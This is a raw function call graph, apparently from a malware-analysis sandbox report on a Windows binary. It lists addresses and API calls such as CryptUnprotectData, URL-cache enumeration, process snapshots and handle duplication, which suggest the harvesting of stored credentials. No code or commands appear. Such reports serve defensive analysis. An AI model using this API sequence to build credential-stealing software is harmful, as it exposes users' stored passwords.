40b6ef 249 API calls 38299->38230 38305 4456e2 38300->38305 38301 40b2cc 27 API calls 38306 445c23 38301->38306 38302 445d83 38302->38230 38303->38297 38648 413fa6 _wcsicmp _wcsicmp 38305->38648 38310 409d1f 6 API calls 38306->38310 38308 445e12 38314 445e6b 38308->38314 38321 40b2cc 27 API calls 38308->38321 38312 445c37 38310->38312 38311 4456eb 38317 4456fd memset memset memset memset 38311->38317 38318 4457ea 38311->38318 38319 445389 255 API calls 38312->38319 38313 445b17 38747 40aebe 38313->38747 38774 445093 23 API calls 38314->38774 38649 409c70 wcscpy wcsrchr 38317->38649 38652 413d29 38318->38652 38325 445c47 38319->38325 38326 445e33 38321->38326 38323 445e7e 38328 445f67 38323->38328 38331 40b2cc 27 API calls 38325->38331 38332 409d1f 6 API calls 38326->38332 38327->38234 38568 403e2d memset memset memset memset memset 38327->38568 38334 40b2cc 27 API calls 38328->38334 38329 445ab2 memset 38335 40b2cc 27 API calls 38329->38335 38337 445c53 38331->38337 38333 445e47 38332->38333 38773 409b98 GetFileAttributesW 38333->38773 38339 445f73 38334->38339 38340 445aa1 38335->38340 38336 409c70 2 API calls 38341 44577e 38336->38341 38342 409d1f 6 API calls 38337->38342 38344 409d1f 6 API calls 38339->38344 38340->38313 38340->38329 38345 409d1f 6 API calls 38340->38345 38353 445389 255 API calls 38340->38353 38734 40add4 38340->38734 38739 40ae51 38340->38739 38346 409c70 2 API calls 38341->38346 38347 445c67 38342->38347 38343 445e56 38343->38314 38351 445e83 memset 38343->38351 38348 445f87 38344->38348 38345->38340 38349 44578d 38346->38349 38350 445389 255 API calls 38347->38350 38777 409b98 GetFileAttributesW 38348->38777 38349->38318 38356 40b2cc 27 API calls 38349->38356 38350->38212 38355 40b2cc 27 API calls 38351->38355 38353->38340 38354->38230 38354->38299 38357 445eab 38355->38357 38358 4457a8 38356->38358 38359 409d1f 6 API calls 38357->38359 38360 409d1f 6 API calls 38358->38360 38361 445ebf 38359->38361 38362 4457b8 38360->38362 38363 40ae18 9 API calls 38361->38363 38651 409b98 GetFileAttributesW 38362->38651 38373 445ef5 38363->38373 38365 4457c7 38365->38318 38367 4087b3 335 API calls 38365->38367 38366 40ae51 9 API calls 38366->38373 38367->38318 38368 445f5c 38370 40aebe FindClose 38368->38370 38369 40add4 2 API calls 38369->38373 38370->38328 38371 40b2cc 27 API calls 38371->38373 38372 409d1f 6 API calls 38372->38373 38373->38366 38373->38368 38373->38369 38373->38371 38373->38372 38375 445f3a 38373->38375 38775 409b98 GetFileAttributesW 38373->38775 38776 445093 23 API calls 38375->38776 38377->38171 38378->38176 38379->38171 38380->38169 38382 40c775 38381->38382 38778 40b1ab free free 38382->38778 38384 40c788 38779 40b1ab free free 38384->38779 38386 40c790 38780 40b1ab free free 38386->38780 38388 40c798 38389 40aa04 free 38388->38389 38390 40c7a0 38389->38390 38781 40c274 memset 38390->38781 38395 40a8ab 9 API calls 38396 40c7c3 38395->38396 38397 40a8ab 9 API calls 38396->38397 38398 40c7d0 38397->38398 38810 40c3c3 38398->38810 38402 40c877 38411 40bdb0 38402->38411 38403 40c86c 38838 4053fe 37 API calls 38403->38838 38406 40c813 _wcslwr 38836 40c634 47 API calls 38406->38836 38408 40c829 wcslen 38409 40c7e5 38408->38409 38409->38402 38409->38403 38835 40a706 wcslen memcpy 38409->38835 38837 40c634 47 API calls 38409->38837 38972 404363 38411->38972 38416 40b2cc 27 API calls 38417 40be02 wcslen 38416->38417 38418 40bf5d 38417->38418 38426 40be1e 38417->38426 38989 40440c 38418->38989 38419 40be26 wcsncmp 38419->38426 38422 40be7d memset 38423 40bea7 memcpy 38422->38423 38422->38426 38424 40bf11 wcschr 38423->38424 38423->38426 38424->38426 38425 40b2cc 27 API calls 38427 40bef6 _wcsnicmp 38425->38427 38426->38418 38426->38419 38426->38422 38426->38423 38426->38424 38426->38425 38428 40bf43 LocalFree 38426->38428 38992 40bd5d 28 API calls 38426->38992 38993 404423 38426->38993 38427->38424 38427->38426 38428->38426 38429 4135f7 39005 4135e0 38429->39005 38432 40b2cc 27 API calls 38433 41360d 38432->38433 38434 40a804 8 API calls 38433->38434 38435 413613 38434->38435 38436 41363e 38435->38436 38438 40b273 27 API calls 38435->38438 38437 4135e0 FreeLibrary 38436->38437 38439 413643 38437->38439 38440 413625 38438->38440 38439->38198 38440->38436 38441 413648 38440->38441 38442 413658 38441->38442 38443 4135e0 FreeLibrary 38441->38443 38442->38198 38444 413666 38443->38444 38444->38198 38447 4136e2 38445->38447 38446 413827 38644 41366b FreeLibrary 38446->38644 38447->38446 38448 4137ac CoTaskMemFree 38447->38448 38448->38447 39008 4449b9 38449->39008 38452 444c1f 38452->38184 38453 4449b9 35 API calls 38455 444b4b 38453->38455 38454 444c15 38457 4449b9 35 API calls 38454->38457 38455->38454 39028 444972 GetVersionExW 38455->39028 38457->38452 38458 444b99 memcmp 38462 444b8c 38458->38462 38459 444c0b 39032 444a85 35 API calls 38459->39032 38462->38458 38462->38459 39029 444aa5 35 API calls 38462->39029 39030 40a7a0 GetVersionExW 38462->39030 39031 444a85 35 API calls 38462->39031 38466 40399d 38465->38466 39033 403a16 38466->39033 38468 403a09 39047 40b1ab free free 38468->39047 38470 403a12 wcsrchr 38470->38191 38471 4039a3 38471->38468 38474 4039f4 38471->38474 39044 40a02c CreateFileW 38471->39044 38474->38468 38475 4099c6 2 API calls 38474->38475 38475->38468 38477 414c2e 16 API calls 38476->38477 38478 404048 38477->38478 38479 414c2e 16 API calls 38478->38479 38480 404056 38479->38480 38481 409d1f 6 API calls 38480->38481 38482 404073 38481->38482 38483 409d1f 6 API calls 38482->38483 38484 40408e 38483->38484 38485 409d1f 6 API calls 38484->38485 38486 4040a6 38485->38486 38487 403af5 20 API calls 38486->38487 38488 4040ba 38487->38488 38489 403af5 20 API calls 38488->38489 38490 4040cb 38489->38490 39074 40414f memset 38490->39074 38492 4040e0 38493 404140 38492->38493 38495 4040ec memset 38492->38495 38497 4099c6 2 API calls 38492->38497 38498 40a8ab 9 API calls 38492->38498 39088 40b1ab free free 38493->39088 38495->38492 38496 404148 38496->38251 38497->38492 38498->38492 39101 40a6e6 WideCharToMultiByte 38499->39101 38501 4087ed 39102 4095d9 memset 38501->39102 38504 408809 memset memset memset memset memset 38505 40b2cc 27 API calls 38504->38505 38506 4088a1 38505->38506 38507 409d1f 6 API calls 38506->38507 38508 4088b1 38507->38508 38509 40b2cc 27 API calls 38508->38509 38510 4088c0 38509->38510 38511 409d1f 6 API calls 38510->38511 38512 4088d0 38511->38512 38513 40b2cc 27 API calls 38512->38513 38514 4088df 38513->38514 38515 409d1f 6 API calls 38514->38515 38516 4088ef 38515->38516 38517 40b2cc 27 API calls 38516->38517 38518 4088fe 38517->38518 38519 409d1f 6 API calls 38518->38519 38520 40890e 38519->38520 38521 40b2cc 27 API calls 38520->38521 38522 40891d 38521->38522 38523 409d1f 6 API calls 38522->38523 38524 40892d 38523->38524 39119 409b98 GetFileAttributesW 38524->39119 38526 40893e 38527 408943 38526->38527 38528 408958 38526->38528 39120 407fdf 75 API calls 38527->39120 39121 409b98 GetFileAttributesW 38528->39121 38531 408964 38532 408969 38531->38532 38533 40897b 38531->38533 39122 4082c7 198 API calls 38532->39122 39123 409b98 GetFileAttributesW 38533->39123 38536 408953 38536->38251 38537 408987 38538 4089a1 38537->38538 38539 40898c 38537->38539 39125 409b98 GetFileAttributesW 38538->39125 39124 408560 29 API calls 38539->39124 38542 4089ad 38543 4089b2 38542->38543 38544 4089c7 38542->38544 39126 408560 29 API calls 38543->39126 39127 409b98 GetFileAttributesW 38544->39127 38547 4089d3 38547->38536 38548 4089d8 38547->38548 39128 408560 29 API calls 38548->39128 38551 40b633 free 38550->38551 38552 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38551->38552 38553 413f00 Process32NextW 38552->38553 38554 413da5 OpenProcess 38553->38554 38555 413f17 CloseHandle 38553->38555 38556 413df3 memset 38554->38556 38559 413eb0 38554->38559 38555->38294 39151 413f27 38556->39151 38558 413ebf free 38558->38559 38559->38553 38559->38558 38560 4099f4 3 API calls 38559->38560 38560->38559 38561 413e37 GetModuleHandleW 38563 413e46 38561->38563 38565 413e1f 38561->38565 38563->38565 38564 413e6a QueryFullProcessImageNameW 38564->38565 38565->38561 38565->38564 39156 413959 38565->39156 39172 413ca4 38565->39172 38567 413ea2 CloseHandle 38567->38559 38569 414c2e 16 API calls 38568->38569 38570 403eb7 38569->38570 38571 414c2e 16 API calls 38570->38571 38572 403ec5 38571->38572 38573 409d1f 6 API calls 38572->38573 38574 403ee2 38573->38574 38575 409d1f 6 API calls 38574->38575 38576 403efd 38575->38576 38577 409d1f 6 API calls 38576->38577 38578 403f15 38577->38578 38579 403af5 20 API calls 38578->38579 38580 403f29 38579->38580 38581 403af5 20 API calls 38580->38581 38582 403f3a 38581->38582 38583 40414f 33 API calls 38582->38583 38589 403f4f 38583->38589 38584 403faf 39185 40b1ab free free 38584->39185 38585 403f5b memset 38585->38589 38587 403fb7 38587->38233 38588 4099c6 2 API calls 38588->38589 38589->38584 38589->38585 38589->38588 38590 40a8ab 9 API calls 38589->38590 38590->38589 38592 414c2e 16 API calls 38591->38592 38593 403d26 38592->38593 38594 414c2e 16 API calls 38593->38594 38595 403d34 38594->38595 38596 409d1f 6 API calls 38595->38596 38597 403d51 38596->38597 38598 409d1f 6 API calls 38597->38598 38599 403d6c 38598->38599 38600 409d1f 6 API calls 38599->38600 38601 403d84 38600->38601 38602 403af5 20 API calls 38601->38602 38603 403d98 38602->38603 38604 403af5 20 API calls 38603->38604 38605 403da9 38604->38605 38606 40414f 33 API calls 38605->38606 38612 403dbe 38606->38612 38607 403e1e 39186 40b1ab free free 38607->39186 38608 403dca memset 38608->38612 38610 403e26 38610->38249 38611 4099c6 2 API calls 38611->38612 38612->38607 38612->38608 38612->38611 38613 40a8ab 9 API calls 38612->38613 38613->38612 38615 414b81 8 API calls 38614->38615 38616 414c40 38615->38616 38617 414c73 memset 38616->38617 39187 409cea 38616->39187 38619 414c94 38617->38619 39190 414592 RegOpenKeyExW 38619->39190 38621 414c64 SHGetSpecialFolderPathW 38623 414d0b 38621->38623 38623->38253 38624 414cc1 38625 414cf4 wcscpy 38624->38625 39191 414bb0 wcscpy 38624->39191 38625->38623 38627 414cd2 39192 4145ac RegQueryValueExW 38627->39192 38629 414ce9 RegCloseKey 38629->38625 38631 409d62 38630->38631 38632 409d43 wcscpy 38630->38632 38635 445389 38631->38635 38633 409719 2 API calls 38632->38633 38634 409d51 wcscat 38633->38634 38634->38631 38636 40ae18 9 API calls 38635->38636 38637 4453c4 38636->38637 38638 40ae51 9 API calls 38637->38638 38639 4453f3 38637->38639 38640 40add4 2 API calls 38637->38640 38643 445403 250 API calls 38637->38643 38638->38637 38641 40aebe FindClose 38639->38641 38640->38637 38642 4453fe 38641->38642 38642->38301 38643->38637 38644->38205 38645->38297 38646->38281 38647->38281 38648->38311 38650 409c89 38649->38650 38650->38336 38651->38365 38653 413d39 38652->38653 38654 413d2f FreeLibrary 38652->38654 38655 40b633 free 38653->38655 38654->38653 38656 413d42 38655->38656 38657 40b633 free 38656->38657 38658 413d4a 38657->38658 38658->38327 38659->38234 38660->38241 38661->38263 38663 44db70 38662->38663 38664 40b6fc memset 38663->38664 38665 409c70 2 API calls 38664->38665 38666 40b732 wcsrchr 38665->38666 38667 40b743 38666->38667 38668 40b746 memset 38666->38668 38667->38668 38669 40b2cc 27 API calls 38668->38669 38670 40b76f 38669->38670 38671 409d1f 6 API calls 38670->38671 38672 40b783 38671->38672 39193 409b98 GetFileAttributesW 38672->39193 38674 40b792 38676 409c70 2 API calls 38674->38676 38688 40b7c2 38674->38688 38678 40b7a5 38676->38678 38681 40b2cc 27 API calls 38678->38681 38679 40b837 CloseHandle 38683 40b83e memset 38679->38683 38680 40b817 39277 409a45 GetTempPathW 38680->39277 38684 40b7b2 38681->38684 39227 40a6e6 WideCharToMultiByte 38683->39227 38685 409d1f 6 API calls 38684->38685 38685->38688 38686 40b827 38686->38683 39194 40bb98 38688->39194 38689 40b866 39228 444432 38689->39228 38692 40bad5 38695 40b04b ??3@YAXPAX 38692->38695 38693 40b273 27 API calls 38694 40b89a 38693->38694 39274 438552 38694->39274 38697 40baf3 38695->38697 38697->38274 38699 40bacd 39308 443d90 110 API calls 38699->39308 38702 40bac6 39307 424f26 122 API calls 38702->39307 38703 40b8bd memset 39298 425413 17 API calls 38703->39298 38706 425413 17 API calls 38724 40b8b8 38706->38724 38709 40a71b MultiByteToWideChar 38709->38724 38710 40a734 MultiByteToWideChar 38710->38724 38713 40b9b5 memcmp 38713->38724 38714 4099c6 2 API calls 38714->38724 38715 404423 37 API calls 38715->38724 38718 4251c4 136 API calls 38718->38724 38719 40bb3e memset memcpy 39309 40a734 MultiByteToWideChar 38719->39309 38721 40bb88 LocalFree 38721->38724 38724->38702 38724->38703 38724->38706 38724->38709 38724->38710 38724->38713 38724->38714 38724->38715 38724->38718 38724->38719 38725 40ba5f memcmp 38724->38725 39299 4253ef 16 API calls 38724->39299 39300 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38724->39300 39301 4253af 17 API calls 38724->39301 39302 4253cf 17 API calls 38724->39302 39303 447280 memset 38724->39303 39304 447960 memset memcpy memcpy memcpy 38724->39304 39305 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38724->39305 39306 447920 memcpy memcpy memcpy 38724->39306 38725->38724 38726->38276 38728 40aebe FindClose 38727->38728 38729 40ae21 38728->38729 38730 4099c6 2 API calls 38729->38730 38731 40ae35 38730->38731 38732 409d1f 6 API calls 38731->38732 38733 40ae49 38732->38733 38733->38340 38735 40ade0 38734->38735 38736 40ae0f 38734->38736 38735->38736 38737 40ade7 wcscmp 38735->38737 38736->38340 38737->38736 38738 40adfe wcscmp 38737->38738 38738->38736 38740 40ae7b FindNextFileW 38739->38740 38741 40ae5c FindFirstFileW 38739->38741 38742 40ae94 38740->38742 38743 40ae8f 38740->38743 38741->38742 38745 40aeb6 38742->38745 38746 409d1f 6 API calls 38742->38746 38744 40aebe FindClose 38743->38744 38744->38742 38745->38340 38746->38745 38748 40aed1 38747->38748 38749 40aec7 FindClose 38747->38749 38748->38202 38749->38748 38751 4099d7 38750->38751 38752 4099da memcpy 38750->38752 38751->38752 38752->38259 38754 40b2cc 27 API calls 38753->38754 38755 44543f 38754->38755 38756 409d1f 6 API calls 38755->38756 38757 44544f 38756->38757 39667 409b98 GetFileAttributesW 38757->39667 38759 44545e 38760 445476 38759->38760 38761 40b6ef 249 API calls 38759->38761 38762 40b2cc 27 API calls 38760->38762 38761->38760 38763 445482 38762->38763 38764 409d1f 6 API calls 38763->38764 38765 445492 38764->38765 39668 409b98 GetFileAttributesW 38765->39668 38767 4454a1 38768 4454b9 38767->38768 38769 40b6ef 249 API calls 38767->38769 38768->38279 38769->38768 38770->38278 38771->38302 38772->38308 38773->38343 38774->38323 38775->38373 38776->38373 38777->38354 38778->38384 38779->38386 38780->38388 38782 414c2e 16 API calls 38781->38782 38783 40c2ae 38782->38783 38839 40c1d3 38783->38839 38788 40c3be 38805 40a8ab 38788->38805 38789 40afcf 2 API calls 38790 40c2fd FindFirstUrlCacheEntryW 38789->38790 38791 40c3b6 38790->38791 38792 40c31e wcschr 38790->38792 38793 40b04b ??3@YAXPAX 38791->38793 38794 40c331 38792->38794 38795 40c35e FindNextUrlCacheEntryW 38792->38795 38793->38788 38797 40a8ab 9 API calls 38794->38797 38795->38792 38796 40c373 GetLastError 38795->38796 38798 40c3ad FindCloseUrlCache 38796->38798 38799 40c37e 38796->38799 38800 40c33e wcschr 38797->38800 38798->38791 38801 40afcf 2 API calls 38799->38801 38800->38795 38802 40c34f 38800->38802 38803 40c391 FindNextUrlCacheEntryW 38801->38803 38804 40a8ab 9 API calls 38802->38804 38803->38792 38803->38798 38804->38795 38933 40a97a 38805->38933 38808 40a8cc 38808->38395 38809 40a8d0 7 API calls 38809->38808 38938 40b1ab free free 38810->38938 38812 40c3dd 38813 40b2cc 27 API calls 38812->38813 38814 40c3e7 38813->38814 38939 414592 RegOpenKeyExW 38814->38939 38816 40c3f4 38817 40c50e 38816->38817 38818 40c3ff 38816->38818 38832 405337 38817->38832 38819 40a9ce 4 API calls 38818->38819 38820 40c418 memset 38819->38820 38940 40aa1d 38820->38940 38823 40c471 38825 40c47a _wcsupr 38823->38825 38824 40c505 RegCloseKey 38824->38817 38826 40a8d0 7 API calls 38825->38826 38827 40c498 38826->38827 38828 40a8d0 7 API calls 38827->38828 38829 40c4ac memset 38828->38829 38830 40aa1d 38829->38830 38831 40c4e4 RegEnumValueW 38830->38831 38831->38824 38831->38825 38942 405220 38832->38942 38834 405340 38834->38409 38835->38406 38836->38408 38837->38409 38838->38402 38840 40ae18 9 API calls 38839->38840 38846 40c210 38840->38846 38841 40ae51 9 API calls 38841->38846 38842 40c264 38843 40aebe FindClose 38842->38843 38845 40c26f 38843->38845 38844 40add4 2 API calls 38844->38846 38851 40e5ed memset memset 38845->38851 38846->38841 38846->38842 38846->38844 38847 40c231 _wcsicmp 38846->38847 38848 40c1d3 34 API calls 38846->38848 38847->38846 38849 40c248 38847->38849 38848->38846 38864 40c084 21 API calls 38849->38864 38852 414c2e 16 API calls 38851->38852 38853 40e63f 38852->38853 38854 409d1f 6 API calls 38853->38854 38855 40e658 38854->38855 38865 409b98 GetFileAttributesW 38855->38865 38857 40e667 38858 409d1f 6 API calls 38857->38858 38860 40e680 38857->38860 38858->38860 38866 409b98 GetFileAttributesW 38860->38866 38861 40e68f 38862 40c2d8 38861->38862 38867 40e4b2 38861->38867 38862->38788 38862->38789 38864->38846 38865->38857 38866->38861 38888 40e01e 38867->38888 38869 40e593 38870 40e5b0 38869->38870 38871 40e59c DeleteFileW 38869->38871 38872 40b04b ??3@YAXPAX 38870->38872 38871->38870 38874 40e5bb 38872->38874 38873 40e521 38873->38869 38911 40e175 38873->38911 38876 40e5c4 CloseHandle 38874->38876 38877 40e5cc 38874->38877 38876->38877 38879 40b633 free 38877->38879 38878 40e573 38880 40e584 38878->38880 38881 40e57c CloseHandle 38878->38881 38882 40e5db 38879->38882 38932 40b1ab free free 38880->38932 38881->38880 38883 40b633 free 38882->38883 38885 40e5e3 38883->38885 38885->38862 38887 40e540 38887->38878 38931 40e2ab 30 API calls 38887->38931 38889 406214 22 API calls 38888->38889 38890 40e03c 38889->38890 38891 40e16b 38890->38891 38892 40dd85 60 API calls 38890->38892 38891->38873 38893 40e06b 38892->38893 38893->38891 38894 40afcf ??2@YAPAXI ??3@YAXPAX 38893->38894 38895 40e08d OpenProcess 38894->38895 38896 40e0a4 GetCurrentProcess DuplicateHandle 38895->38896 38900 40e152 38895->38900 38897 40e0d0 GetFileSize 38896->38897 38898 40e14a CloseHandle 38896->38898 38901 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38897->38901 38898->38900 38899 40e160 38903 40b04b ??3@YAXPAX 38899->38903 38900->38899 38902 406214 22 API calls 38900->38902 38904 40e0ea 38901->38904 38902->38899 38903->38891 38905 4096dc CreateFileW 38904->38905 38906 40e0f1 CreateFileMappingW 38905->38906 38907 40e140 CloseHandle CloseHandle 38906->38907 38908 40e10b MapViewOfFile 38906->38908 38907->38898 38909 40e13b CloseHandle 38908->38909 38910 40e11f WriteFile UnmapViewOfFile 38908->38910 38909->38907 38910->38909 38912 40e18c 38911->38912 38913 406b90 11 API calls 38912->38913 38914 40e19f 38913->38914 38915 40e1a7 memset 38914->38915 38916 40e299 38914->38916 38921 40e1e8 38915->38921 38917 4069a3 ??3@YAXPAX free 38916->38917 38918 40e2a4 38917->38918 38918->38887 38919 406e8f 13 API calls 38919->38921 38920 406b53 SetFilePointerEx ReadFile 38920->38921 38921->38919 38921->38920 38922 40dd50 _wcsicmp 38921->38922 38923 40e283 38921->38923 38927 40742e 8 API calls 38921->38927 38928 40aae3 wcslen wcslen _memicmp 38921->38928 38929 40e244 _snwprintf 38921->38929 38922->38921 38924 40e291 38923->38924 38925 40e288 free 38923->38925 38926 40aa04 free 38924->38926 38925->38924 38926->38916 38927->38921 38928->38921 38930 40a8d0 7 API calls 38929->38930 38930->38921 38931->38887 38932->38869 38935 40a980 38933->38935 38934 40a8bb 38934->38808 38934->38809 38935->38934 38936 40a995 _wcsicmp 38935->38936 38937 40a99c wcscmp 38935->38937 38936->38935 38937->38935 38938->38812 38939->38816 38941 40aa23 RegEnumValueW 38940->38941 38941->38823 38941->38824 38943 40522a 38942->38943 38968 405329 38942->38968 38944 40b2cc 27 API calls 38943->38944 38945 405234 38944->38945 38946 40a804 8 API calls 38945->38946 38947 40523a 38946->38947 38969 40b273 38947->38969 38949 405248 _mbscpy _mbscat 38950 40526c 38949->38950 38951 40b273 27 API calls 38950->38951 38952 405279 38951->38952 38953 40b273 27 API calls 38952->38953 38954 40528f 38953->38954 38955 40b273 27 API calls 38954->38955 38956 4052a5 38955->38956 38957 40b273 27 API calls 38956->38957 38958 4052bb 38957->38958 38959 40b273 27 API calls 38958->38959 38960 4052d1 38959->38960 38961 40b273 27 API calls 38960->38961 38962 4052e7 38961->38962 38963 40b273 27 API calls 38962->38963 38964 4052fd 38963->38964 38965 40b273 27 API calls 38964->38965 38966 405313 38965->38966 38967 40b273 27 API calls 38966->38967 38967->38968 38968->38834 38970 40b58d 27 API calls 38969->38970 38971 40b18c 38970->38971 38971->38949 38973 40440c FreeLibrary 38972->38973 38974 40436d 38973->38974 38975 40a804 8 API calls 38974->38975 38976 404377 38975->38976 38977 4043f7 38976->38977 38978 40b273 27 API calls 38976->38978 38977->38416 38977->38418 38979 40438d 38978->38979 38980 40b273 27 API calls 38979->38980 38981 4043a7 38980->38981 38982 40b273 27 API calls 38981->38982 38983 4043ba 38982->38983 38984 40b273 27 API calls 38983->38984 38985 4043ce 38984->38985 38986 40b273 27 API calls 38985->38986 38987 4043e2 38986->38987 38987->38977 38988 40440c FreeLibrary 38987->38988 38988->38977 38990 404413 FreeLibrary 38989->38990 38991 40441e 38989->38991 38990->38991 38991->38429 38992->38426 38994 40447e 38993->38994 38995 40442e 38993->38995 38996 404485 CryptUnprotectData 38994->38996 38997 40449c 38994->38997 38998 40b2cc 27 API calls 38995->38998 38996->38997 38997->38426 38999 404438 38998->38999 39000 40a804 8 API calls 38999->39000 39001 40443e 39000->39001 39002 40444f 39001->39002 39003 40b273 27 API calls 39001->39003 39002->38994 39004 404475 FreeLibrary 39002->39004 39003->39002 39004->38994 39006 4135f6 39005->39006 39007 4135eb FreeLibrary 39005->39007 39006->38432 39007->39006 39009 4449c4 39008->39009 39027 444a48 39008->39027 39010 40b2cc 27 API calls 39009->39010 39011 4449cb 39010->39011 39012 40a804 8 API calls 39011->39012 39013 4449d1 39012->39013 39014 40b273 27 API calls 39013->39014 39015 4449dc 39014->39015 39016 40b273 27 API calls 39015->39016 39017 4449f3 39016->39017 39018 40b273 27 API calls 39017->39018 39019 444a04 39018->39019 39020 40b273 27 API calls 39019->39020 39021 444a15 39020->39021 39022 40b273 27 API calls 39021->39022 39023 444a26 39022->39023 39024 40b273 27 API calls 39023->39024 39025 444a37 39024->39025 39026 40b273 27 API calls 39025->39026 39026->39027 39027->38452 39027->38453 39028->38462 39029->38462 39030->38462 39031->38462 39032->38454 39034 403a29 39033->39034 39048 403bed memset memset 39034->39048 39036 403ae7 39061 40b1ab free free 39036->39061 39037 403a3f memset 39041 403a2f 39037->39041 39039 403aef 39039->38471 39040 409d1f 6 API calls 39040->39041 39041->39036 39041->39037 39041->39040 39042 409b98 GetFileAttributesW 39041->39042 39043 40a8d0 7 API calls 39041->39043 39042->39041 39043->39041 39045 40a051 GetFileTime CloseHandle 39044->39045 39046 4039ca CompareFileTime 39044->39046 39045->39046 39046->38471 39047->38470 39049 414c2e 16 API calls 39048->39049 39050 403c38 39049->39050 39051 409719 2 API calls 39050->39051 39052 403c3f wcscat 39051->39052 39053 414c2e 16 API calls 39052->39053 39054 403c61 39053->39054 39055 409719 2 API calls 39054->39055 39056 403c68 wcscat 39055->39056 39062 403af5 39056->39062 39059 403af5 20 API calls 39060 403c95 39059->39060 39060->39041 39061->39039 39063 403b02 39062->39063 39064 40ae18 9 API calls 39063->39064 39073 403b37 39064->39073 39065 403bdb 39067 40aebe FindClose 39065->39067 39066 40add4 wcscmp wcscmp 39066->39073 39068 403be6 39067->39068 39068->39059 39069 40a8d0 7 API calls 39069->39073 39070 40ae18 9 API calls 39070->39073 39071 40ae51 9 API calls 39071->39073 39072 40aebe FindClose 39072->39073 39073->39065 39073->39066 39073->39069 39073->39070 39073->39071 39073->39072 39075 409d1f 6 API calls 39074->39075 39076 404190 39075->39076 39089 409b98 GetFileAttributesW 39076->39089 39078 40419c 39079 4041a7 6 API calls 39078->39079 39080 40435c 39078->39080 39081 40424f 39079->39081 39080->38492 39081->39080 39083 40425e memset 39081->39083 39085 409d1f 6 API calls 39081->39085 39086 40a8ab 9 API calls 39081->39086 39090 414842 39081->39090 39083->39081 39084 404296 wcscpy 39083->39084 39084->39081 39085->39081 39087 4042b6 memset memset _snwprintf wcscpy 39086->39087 39087->39081 39088->38496 39089->39078 39093 41443e 39090->39093 39092 414866 39092->39081 39094 41444b 39093->39094 39095 414451 39094->39095 39096 4144a3 GetPrivateProfileStringW 39094->39096 39097 414491 39095->39097 39098 414455 wcschr 39095->39098 39096->39092 39100 414495 WritePrivateProfileStringW 39097->39100 39098->39097 39099 414463 _snwprintf 39098->39099 39099->39100 39100->39092 39101->38501 39103 40b2cc 27 API calls 39102->39103 39104 409615 39103->39104 39105 409d1f 6 API calls 39104->39105 39106 409625 39105->39106 39129 409b98 GetFileAttributesW 39106->39129 39108 409634 39109 409648 39108->39109 39146 4091b8 238 API calls 39108->39146 39111 40b2cc 27 API calls 39109->39111 39113 408801 39109->39113 39112 40965d 39111->39112 39114 409d1f 6 API calls 39112->39114 39113->38504 39113->38536 39115 40966d 39114->39115 39130 409b98 GetFileAttributesW 39115->39130 39117 40967c 39117->39113 39131 409529 39117->39131 39119->38526 39120->38536 39121->38531 39122->38536 39123->38537 39124->38538 39125->38542 39126->38544 39127->38547 39128->38536 39129->39108 39130->39117 39147 4096c3 CreateFileW 39131->39147 39133 409543 39134 4095cd 39133->39134 39135 409550 GetFileSize 39133->39135 39134->39113 39136 409577 CloseHandle 39135->39136 39137 40955f 39135->39137 39136->39134 39142 409585 39136->39142 39138 40afcf 2 API calls 39137->39138 39139 409569 39138->39139 39148 40a2ef ReadFile 39139->39148 39141 409574 39141->39136 39142->39134 39143 4095c3 39142->39143 39149 408b8d 38 API calls 39142->39149 39150 40908b 55 API calls 39143->39150 39146->39109 39147->39133 39148->39141 39149->39142 39150->39134 39178 413f4f 39151->39178 39154 413f37 K32GetModuleFileNameExW 39155 413f4a 39154->39155 39155->38565 39157 413969 wcscpy 39156->39157 39158 41396c wcschr 39156->39158 39170 413a3a 39157->39170 39158->39157 39160 41398e 39158->39160 39182 4097f7 wcslen wcslen _memicmp 39160->39182 39162 41399a 39163 4139a4 memset 39162->39163 39164 4139e6 39162->39164 39183 409dd5 GetWindowsDirectoryW wcscpy 39163->39183 39166 413a31 wcscpy 39164->39166 39167 4139ec memset 39164->39167 39166->39170 39184 409dd5 GetWindowsDirectoryW wcscpy 39167->39184 39168 4139c9 wcscpy wcscat 39168->39170 39170->38565 39171 413a11 memcpy wcscat 39171->39170 39173 413cb0 GetModuleHandleW 39172->39173 39174 413cda 39172->39174 39173->39174 39175 413cbf 39173->39175 39176 413ce3 GetProcessTimes 39174->39176 39177 413cf6 39174->39177 39175->39174 39176->38567 39177->38567 39179 413f54 39178->39179 39181 413f2f 39178->39181 39180 40a804 8 API calls 39179->39180 39180->39181 39181->39154 39181->39155 39182->39162 39183->39168 39184->39171 39185->38587 39186->38610 39188 409cf9 GetVersionExW 39187->39188 39189 409d0a 39187->39189 39188->39189 39189->38617 39189->38621 39190->38624 39191->38627 39192->38629 39193->38674 39195 40bba5 39194->39195 39310 40cc26 39195->39310 39198 40bd4b 39331 40cc0c 39198->39331 39203 40b2cc 27 API calls 39204 40bbef 39203->39204 39338 40ccf0 _wcsicmp 39204->39338 39206 40bbf5 39206->39198 39339 40ccb4 6 API calls 39206->39339 39208 40bc26 39209 40cf04 17 API calls 39208->39209 39210 40bc2e 39209->39210 39211 40bd43 39210->39211 39212 40b2cc 27 API calls 39210->39212 39213 40cc0c 4 API calls 39211->39213 39214 40bc40 39212->39214 39213->39198 39340 40ccf0 _wcsicmp 39214->39340 39216 40bc46 39216->39211 39217 40bc61 memset memset WideCharToMultiByte 39216->39217 39341 40103c strlen 39217->39341 39219 40bcc0 39220 40b273 27 API calls 39219->39220 39221 40bcd0 memcmp 39220->39221 39221->39211 39222 40bce2 39221->39222 39223 404423 37 API calls 39222->39223 39224 40bd10 39223->39224 39224->39211 39225 40bd3a LocalFree 39224->39225 39226 40bd1f memcpy 39224->39226 39225->39211 39226->39225 39227->38689 39401 4438b5 39228->39401 39230 44444c 39231 40b879 39230->39231 39415 415a6d 39230->39415 39231->38692 39231->38693 39234 444486 39236 4444b9 memcpy 39234->39236 39273 4444a4 39234->39273 39235 44469e 39235->39231 39466 443d90 110 API calls 39235->39466 39419 415258 39236->39419 39239 444524 39240 444541 39239->39240 39241 44452a 39239->39241 39422 444316 39240->39422 39456 416935 16 API calls 39241->39456 39245 444316 18 API calls 39246 444563 39245->39246 39247 444316 18 API calls 39246->39247 39248 44456f 39247->39248 39249 444316 18 API calls 39248->39249 39250 44457f 39249->39250 39250->39273 39436 432d4e 39250->39436 39253 444316 18 API calls 39254 4445b0 39253->39254 39440 41eed2 39254->39440 39256 4445cf 39257 4445d6 39256->39257 39258 4445ee 